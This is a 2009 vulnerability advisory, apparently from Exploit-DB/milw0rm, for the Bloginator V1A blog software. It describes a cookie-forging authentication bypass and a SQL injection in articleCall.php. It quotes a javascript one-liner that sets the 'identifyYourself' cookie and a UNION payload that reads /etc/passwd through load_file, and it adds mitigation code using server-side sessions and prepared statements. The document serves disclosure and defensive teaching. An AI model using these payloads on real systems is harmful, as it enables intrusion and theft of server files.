Vendor: Bloginator
By: FireShot, Jacopo Vuga
CVSS: 8.8 (HIGH)
Title: Insecure Cookie Handling & SQL Injection
CWE: 264, 89
Product Name: Bloginator
Affected Version From: V1A
Affected Version To: V1A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Insecure Cookie Handling & SQL Injection

The first vulnerability is an insecure cookie handling vulnerability: the application treats the presence of a cookie named identifyYourself with the fixed value 'you are identified' as proof of a successful login, so anyone who sets that cookie in their own browser is granted authenticated access without credentials. The second vulnerability is a SQL injection in articleCall.php, where the id parameter is interpolated directly into a SELECT query, allowing an authenticated user to inject arbitrary SQL.

Mitigation:

Do not treat a fixed, client-settable cookie value as proof of login: bind authentication to a server-side session (and set the session cookie's Secure and HttpOnly flags), and pass user input to SQL queries as bound parameters instead of interpolating it into the query string.

Exploit-DB raw data:

##########################################################################

Author = FireShot , Jacopo Vuga.
Mail = fireshot<at>autistici<dot>org

Software = Bloginator V1A
Download = http://kamads.com/kamads_ads/download.php?email=bloginator&ID=0

Greets to = Osirys, Myral, str0ke

###########################################################################

Vulnerability = Insecure Cookie Handling

###########################################################################

[CODE]

[URL] www.site.com/bloginator/articleCall.php

global $name,$password,$returnLink;
$p_name = strip_tags(substr($_POST['name'],0,32));
$p_password = strip_tags(substr($_POST['password'],0,32));
if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
 {

           setcookie("identifyYourself","you are identified");
           print "Login successfull<br>";
           print $returnLink;
       }
   else {print "Wrong username or password";
   }
}

[/CODE]


[EXPLOIT]

javascript:document.cookie = "identifyYourself=you+are+identified; path=/";

[/EXPLOIT]
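The quoted login code above hands out a cookie whose value is constant, so the cookie itself becomes the credential. The following is an added example (not Bloginator's code and not part of the original advisory) of the same login handler rewritten so that the client only ever holds an opaque PHP session id, with the authenticated state kept server-side. The variables $name, $password and $returnLink mirror the globals in the original fragment but are given placeholder values here; the password is stored as a password_hash() digest rather than the crypt() form the original used.

```php
<?php
// Added example, not Bloginator's code: login that records authentication in a
// server-side session instead of a static "you are identified" cookie.
// Constructed placeholders standing in for the original globals; a real
// deployment loads these from configuration, never from source.
$name       = 'admin';
$password   = password_hash('REPLACE-ME', PASSWORD_DEFAULT);
$returnLink = '<a href="index.php">Back</a>';

// Session cookie flags: HTTPS only, unreadable by script, not sent cross-site.
session_set_cookie_params([
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);
session_start();

function login(string $p_name, string $p_password, string $name, string $password_hash): bool
{
    // hash_equals() compares the username in constant time; password_verify()
    // checks the submitted password against the stored digest.
    if (!hash_equals($name, $p_name) || !password_verify($p_password, $password_hash)) {
        return false;
    }
    // Issue a fresh session id on login so a pre-set id (session fixation) is dropped.
    session_regenerate_id(true);
    $_SESSION['authenticated'] = true;
    $_SESSION['user'] = $name;
    return true;
}

function isAuthenticated(): bool
{
    return !empty($_SESSION['authenticated']);
}

// Protected pages call this at the top instead of inspecting a cookie value.
function requireLogin(): void
{
    if (!isAuthenticated()) {
        http_response_code(403);
        exit('Not authorised');
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $p_name     = (string) ($_POST['name'] ?? '');
    $p_password = (string) ($_POST['password'] ?? '');
    if (login($p_name, $p_password, $name, $password)) {
        print "Login successful<br>";
        print $returnLink;
    } else {
        print "Wrong username or password";
    }
}
```

With this structure a forged identifyYourself cookie does nothing: the only thing the browser can present is a session id, and the server decides whether that session is authenticated. articleCall.php and the other admin pages would call requireLogin() before doing any work.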

############################################################################

Vulnerability = SQL injection

############################################################################

[CODE]

[URL] www.site.com/bloginator/articleCall.php

$action = @$_GET['action'];
[...]
$id = $_GET['id'];
[...]
function editArticle($id,$message)
{
global $returnLink;
$query = "select * FROM articles WHERE id='$id'";
$sql = mysql_query($query) or die(mysql_query());
$title = mysql_result($sql,0,'title');
$title = htmlentities($title);
$article = mysql_result($sql,0,'article');
$article = htmlentities($article);
$link = mysql_result($sql,0,'link');
$link = htmlentities($link);

startHTML("Edit ID # ".$id);
?>

[/CODE]

[EXPLOIT]

As admin (after the cookie exploit) you can inject arbitrary SQL code into the query.

www.site.com/action=edit&id=fireshot' union select 1,2,3,4,load_file('/etc/passwd'),6,7 order by '*

[/EXPLOIT]
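The editArticle() fragment above builds its query by string interpolation, which is what lets the id parameter change the query's structure. Below is an added example (not Bloginator's code) of the same function using a PDO prepared statement, so the id travels to the database as a bound integer parameter and can never alter the SQL. The $pdo connection, the DSN and its credentials are placeholders assumed for the example.

```php
<?php
// Added example, not Bloginator's code: editArticle() with the id passed as a
// bound parameter instead of being spliced into the SQL string.

function editArticle(PDO $pdo, string $id): ?array
{
    // Article ids are integers; reject anything else before it reaches the database.
    if (!ctype_digit($id)) {
        return null;
    }

    // The SQL text is fixed; the placeholder is filled by the driver, not by concatenation.
    $stmt = $pdo->prepare('SELECT title, article, link FROM articles WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }

    // HTML-encode for output, as the original did with htmlentities().
    return [
        'id'      => (int) $id,
        'title'   => htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'),
        'article' => htmlspecialchars($row['article'], ENT_QUOTES, 'UTF-8'),
        'link'    => htmlspecialchars($row['link'], ENT_QUOTES, 'UTF-8'),
    ];
}

// Placeholder DSN and credentials (assumed for the example). Emulated prepares
// are disabled so the statement is prepared by the MySQL server itself.
$pdo = new PDO('mysql:host=localhost;dbname=bloginator;charset=utf8mb4', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$article = editArticle($pdo, (string) ($_GET['id'] ?? ''));
if ($article === null) {
    http_response_code(404);
    exit('No such article');
}
print 'Edit ID # ' . $article['id'];
```

Because the query text never changes, an id such as the one in the exploit above is simply rejected by the ctype_digit() check; even without that check, the bound parameter would be compared as a value and the UNION would not be parsed as SQL. Enabling ERRMODE_EXCEPTION also replaces the original's `or die(...)` handling, which echoed database errors to the user.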

############################################################################## 

# milw0rm.com [2009-03-19]